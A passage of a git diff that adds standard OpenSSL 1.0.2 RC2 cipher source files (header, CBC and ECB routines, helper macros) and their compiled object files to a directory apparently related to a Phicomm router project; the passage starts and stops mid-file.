+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#ifndef HEADER_RC2_H
+# define HEADER_RC2_H
+
+# include <openssl/opensslconf.h>/* OPENSSL_NO_RC2, RC2_INT */
+# ifdef OPENSSL_NO_RC2
+#  error RC2 is disabled.
+# endif
+
+# define RC2_ENCRYPT     1
+# define RC2_DECRYPT     0
+
+# define RC2_BLOCK       8
+# define RC2_KEY_LENGTH  16
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+typedef struct rc2_key_st {
+    RC2_INT data[64];
+} RC2_KEY;
+
+# ifdef OPENSSL_FIPS
+void private_RC2_set_key(RC2_KEY *key, int len, const unsigned char *data,
+                         int bits);
+# endif
+void RC2_set_key(RC2_KEY *key, int len, const unsigned char *data, int bits);
+void RC2_ecb_encrypt(const unsigned char *in, unsigned char *out,
+                     RC2_KEY *key, int enc);
+void RC2_encrypt(unsigned long *data, RC2_KEY *key);
+void RC2_decrypt(unsigned long *data, RC2_KEY *key);
+void RC2_cbc_encrypt(const unsigned char *in, unsigned char *out, long length,
+                     RC2_KEY *ks, unsigned char *iv, int enc);
+void RC2_cfb64_encrypt(const unsigned char *in, unsigned char *out,
+                       long length, RC2_KEY *schedule, unsigned char *ivec,
+                       int *num, int enc);
+void RC2_ofb64_encrypt(const unsigned char *in, unsigned char *out,
+                       long length, RC2_KEY *schedule, unsigned char *ivec,
+                       int *num);
+
+#ifdef  __cplusplus
+}
+#endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2_cbc.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2_cbc.c
new file mode 100644
index 0000000..5eaf01d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2_cbc.c
@@ -0,0 +1,228 @@
+/* crypto/rc2/rc2_cbc.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <openssl/rc2.h>
+#include "rc2_locl.h"
+
+void RC2_cbc_encrypt(const unsigned char *in, unsigned char *out, long length,
+                     RC2_KEY *ks, unsigned char *iv, int encrypt)
+{
+    register unsigned long tin0, tin1;
+    register unsigned long tout0, tout1, xor0, xor1;
+    register long l = length;
+    unsigned long tin[2];
+
+    if (encrypt) {
+        c2l(iv, tout0);
+        c2l(iv, tout1);
+        iv -= 8;
+        for (l -= 8; l >= 0; l -= 8) {
+            c2l(in, tin0);
+            c2l(in, tin1);
+            tin0 ^= tout0;
+            tin1 ^= tout1;
+            tin[0] = tin0;
+            tin[1] = tin1;
+            RC2_encrypt(tin, ks);
+            tout0 = tin[0];
+            l2c(tout0, out);
+            tout1 = tin[1];
+            l2c(tout1, out);
+        }
+        if (l != -8) {
+            c2ln(in, tin0, tin1, l + 8);
+            tin0 ^= tout0;
+            tin1 ^= tout1;
+            tin[0] = tin0;
+            tin[1] = tin1;
+            RC2_encrypt(tin, ks);
+            tout0 = tin[0];
+            l2c(tout0, out);
+            tout1 = tin[1];
+            l2c(tout1, out);
+        }
+        l2c(tout0, iv);
+        l2c(tout1, iv);
+    } else {
+        c2l(iv, xor0);
+        c2l(iv, xor1);
+        iv -= 8;
+        for (l -= 8; l >= 0; l -= 8) {
+            c2l(in, tin0);
+            tin[0] = tin0;
+            c2l(in, tin1);
+            tin[1] = tin1;
+            RC2_decrypt(tin, ks);
+            tout0 = tin[0] ^ xor0;
+            tout1 = tin[1] ^ xor1;
+            l2c(tout0, out);
+            l2c(tout1, out);
+            xor0 = tin0;
+            xor1 = tin1;
+        }
+        if (l != -8) {
+            c2l(in, tin0);
+            tin[0] = tin0;
+            c2l(in, tin1);
+            tin[1] = tin1;
+            RC2_decrypt(tin, ks);
+            tout0 = tin[0] ^ xor0;
+            tout1 = tin[1] ^ xor1;
+            l2cn(tout0, tout1, out, l + 8);
+            xor0 = tin0;
+            xor1 = tin1;
+        }
+        l2c(xor0, iv);
+        l2c(xor1, iv);
+    }
+    tin0 = tin1 = tout0 = tout1 = xor0 = xor1 = 0;
+    tin[0] = tin[1] = 0;
+}
+
+void RC2_encrypt(unsigned long *d, RC2_KEY *key)
+{
+    int i, n;
+    register RC2_INT *p0, *p1;
+    register RC2_INT x0, x1, x2, x3, t;
+    unsigned long l;
+
+    l = d[0];
+    x0 = (RC2_INT) l & 0xffff;
+    x1 = (RC2_INT) (l >> 16L);
+    l = d[1];
+    x2 = (RC2_INT) l & 0xffff;
+    x3 = (RC2_INT) (l >> 16L);
+
+    n = 3;
+    i = 5;
+
+    p0 = p1 = &(key->data[0]);
+    for (;;) {
+        t = (x0 + (x1 & ~x3) + (x2 & x3) + *(p0++)) & 0xffff;
+        x0 = (t << 1) | (t >> 15);
+        t = (x1 + (x2 & ~x0) + (x3 & x0) + *(p0++)) & 0xffff;
+        x1 = (t << 2) | (t >> 14);
+        t = (x2 + (x3 & ~x1) + (x0 & x1) + *(p0++)) & 0xffff;
+        x2 = (t << 3) | (t >> 13);
+        t = (x3 + (x0 & ~x2) + (x1 & x2) + *(p0++)) & 0xffff;
+        x3 = (t << 5) | (t >> 11);
+
+        if (--i == 0) {
+            if (--n == 0)
+                break;
+            i = (n == 2) ? 6 : 5;
+
+            x0 += p1[x3 & 0x3f];
+            x1 += p1[x0 & 0x3f];
+            x2 += p1[x1 & 0x3f];
+            x3 += p1[x2 & 0x3f];
+        }
+    }
+
+    d[0] =
+        (unsigned long)(x0 & 0xffff) | ((unsigned long)(x1 & 0xffff) << 16L);
+    d[1] =
+        (unsigned long)(x2 & 0xffff) | ((unsigned long)(x3 & 0xffff) << 16L);
+}
+
+void RC2_decrypt(unsigned long *d, RC2_KEY *key)
+{
+    int i, n;
+    register RC2_INT *p0, *p1;
+    register RC2_INT x0, x1, x2, x3, t;
+    unsigned long l;
+
+    l = d[0];
+    x0 = (RC2_INT) l & 0xffff;
+    x1 = (RC2_INT) (l >> 16L);
+    l = d[1];
+    x2 = (RC2_INT) l & 0xffff;
+    x3 = (RC2_INT) (l >> 16L);
+
+    n = 3;
+    i = 5;
+
+    p0 = &(key->data[63]);
+    p1 = &(key->data[0]);
+    for (;;) {
+        t = ((x3 << 11) | (x3 >> 5)) & 0xffff;
+        x3 = (t - (x0 & ~x2) - (x1 & x2) - *(p0--)) & 0xffff;
+        t = ((x2 << 13) | (x2 >> 3)) & 0xffff;
+        x2 = (t - (x3 & ~x1) - (x0 & x1) - *(p0--)) & 0xffff;
+        t = ((x1 << 14) | (x1 >> 2)) & 0xffff;
+        x1 = (t - (x2 & ~x0) - (x3 & x0) - *(p0--)) & 0xffff;
+        t = ((x0 << 15) | (x0 >> 1)) & 0xffff;
+        x0 = (t - (x1 & ~x3) - (x2 & x3) - *(p0--)) & 0xffff;
+
+        if (--i == 0) {
+            if (--n == 0)
+                break;
+            i = (n == 2) ? 6 : 5;
+
+            x3 = (x3 - p1[x2 & 0x3f]) & 0xffff;
+            x2 = (x2 - p1[x1 & 0x3f]) & 0xffff;
+            x1 = (x1 - p1[x0 & 0x3f]) & 0xffff;
+            x0 = (x0 - p1[x3 & 0x3f]) & 0xffff;
+        }
+    }
+
+    d[0] =
+        (unsigned long)(x0 & 0xffff) | ((unsigned long)(x1 & 0xffff) << 16L);
+    d[1] =
+        (unsigned long)(x2 & 0xffff) | ((unsigned long)(x3 & 0xffff) << 16L);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2_cbc.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2_cbc.o
new file mode 100644
index 0000000000000000000000000000000000000000..3a1ed1fa6ef938873f7c111acd259bbdb3c0f1a5
GIT binary patch
literal 4176
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
I|9buZ0~)w~y8r+H

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2_ecb.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2_ecb.c
new file mode 100644
index 0000000..48442a3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2_ecb.c
@@ -0,0 +1,92 @@
+/* crypto/rc2/rc2_ecb.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <openssl/rc2.h>
+#include "rc2_locl.h"
+#include <openssl/opensslv.h>
+
+const char RC2_version[] = "RC2" OPENSSL_VERSION_PTEXT;
+
+/*-
+ * RC2 as implemented frm a posting from
+ * Newsgroups: sci.crypt
+ * Sender: pgut01@cs.auckland.ac.nz (Peter Gutmann)
+ * Subject: Specification for Ron Rivests Cipher No.2
+ * Message-ID: <4fk39f$f70@net.auckland.ac.nz>
+ * Date: 11 Feb 1996 06:45:03 GMT
+ */
+
+void RC2_ecb_encrypt(const unsigned char *in, unsigned char *out, RC2_KEY *ks,
+                     int encrypt)
+{
+    unsigned long l, d[2];
+
+    c2l(in, l);
+    d[0] = l;
+    c2l(in, l);
+    d[1] = l;
+    if (encrypt)
+        RC2_encrypt(d, ks);
+    else
+        RC2_decrypt(d, ks);
+    l = d[0];
+    l2c(l, out);
+    l = d[1];
+    l2c(l, out);
+    l = d[0] = d[1] = 0;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2_ecb.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2_ecb.o
new file mode 100644
index 0000000000000000000000000000000000000000..27d3b18e66ffe45b62308295456a4c92ea7945d9
GIT binary patch
literal 1968
zcmbtUPiqrV5P!+0CTbf~@eruUJ5;IIJ~ms$R#4N%G;0YKniixUmd$2kYMM>hyhtme
zLh%rS;79Q87w}lni(kNxAc7v0-bAP~yYDsI?e?MrvorIXKkv`X+n2@iQalzTl49fz
z8Cnu0L`@9!yr<?#nv9YCbC-Ts^!~oy|Dx~ypf!DvxI6`Zy?<{qo7)>CUw=k5H7F(Y
zH_s<iXk>Wu8<zM!;)wyc`wDzB{X#+qnXT!weiiOV=)0fjqmSOI;m>M8qaD-bv|Xnw
z9owl?$~4DRrcq6!%ces$HFtxMQlW5*POVpa4)4)<Hp|qR+|8b6=3ZzjQ?Fn3VObxK
zn*kmHE<IQ$aYFVGQ-F~!_=3cqt&-SwCN?peOudDRy9hWkQWHPLbY?fcoL1u->C8ep
zg-{gXohQhzgD9U8*%91}+|AJ}1u8|6;+^KWM<L1MARr2f-mXGUpAdiQ7=9Lz^MU<)
zcLLZ1Fy3#NasWi(w@<+DpMY-wJ{~yl6|g;WEzPj4DzgZT4r+$&Snf`T6QfjKSzIU^
zD@#k2;+nCxuvjh{ew2v7jG8T?jV?E>reQUjM%~=p@&cdQZg;coz(R9kIqbwJ@Sg*p
z?gsF&0B#2GbO5IUhxx-991`p9w76L%tjk?rHl*g-TPEZ7HYcoRa+9!Xw@aAY_6@7u
zYS|9>oHn-^%=V0T5Me)ddaUENJGRSrAO|bi4WsUwEql23e`pkPan{3=k_QY)&WCUL
zu~J8gbAxx92M*Fh@f36c;@sgna)Pr0$2mYe{Bqt4e^_8_kfy=Fn*W-Q^Nlr+^b+hn
zV5Gx2^-V&Blwuwf%vU8K<X0iDg>bolDHp*n^<e0D6c`b^3K;$^!u!vPd<woG$@`bs
z6HqWToIfY><-3vb;e4FJsQ$kb4Uv7u{^MUt=1V+kZCtA()_)}=zS%Po`B*dDdw|GK
aaiBUH0TSg7k#W$X@;?ZWA4d90IR7v2da_vn

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2_locl.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2_locl.h
new file mode 100644
index 0000000..e72a20c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2_locl.h
@@ -0,0 +1,155 @@
+/* crypto/rc2/rc2_locl.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#undef c2l
+#define c2l(c,l)        (l =((unsigned long)(*((c)++)))    , \
+                         l|=((unsigned long)(*((c)++)))<< 8L, \
+                         l|=((unsigned long)(*((c)++)))<<16L, \
+                         l|=((unsigned long)(*((c)++)))<<24L)
+
+/* NOTE - c is not incremented as per c2l */
+#undef c2ln
+#define c2ln(c,l1,l2,n) { \
+                        c+=n; \
+                        l1=l2=0; \
+                        switch (n) { \
+                        case 8: l2 =((unsigned long)(*(--(c))))<<24L; \
+                        case 7: l2|=((unsigned long)(*(--(c))))<<16L; \
+                        case 6: l2|=((unsigned long)(*(--(c))))<< 8L; \
+                        case 5: l2|=((unsigned long)(*(--(c))));     \
+                        case 4: l1 =((unsigned long)(*(--(c))))<<24L; \
+                        case 3: l1|=((unsigned long)(*(--(c))))<<16L; \
+                        case 2: l1|=((unsigned long)(*(--(c))))<< 8L; \
+                        case 1: l1|=((unsigned long)(*(--(c))));     \
+                                } \
+                        }
+
+#undef l2c
+#define l2c(l,c)        (*((c)++)=(unsigned char)(((l)     )&0xff), \
+                         *((c)++)=(unsigned char)(((l)>> 8L)&0xff), \
+                         *((c)++)=(unsigned char)(((l)>>16L)&0xff), \
+                         *((c)++)=(unsigned char)(((l)>>24L)&0xff))
+
+/* NOTE - c is not incremented as per l2c */
+#undef l2cn
+#define l2cn(l1,l2,c,n) { \
+                        c+=n; \
+                        switch (n) { \
+                        case 8: *(--(c))=(unsigned char)(((l2)>>24L)&0xff); \
+                        case 7: *(--(c))=(unsigned char)(((l2)>>16L)&0xff); \
+                        case 6: *(--(c))=(unsigned char)(((l2)>> 8L)&0xff); \
+                        case 5: *(--(c))=(unsigned char)(((l2)     )&0xff); \
+                        case 4: *(--(c))=(unsigned char)(((l1)>>24L)&0xff); \
+                        case 3: *(--(c))=(unsigned char)(((l1)>>16L)&0xff); \
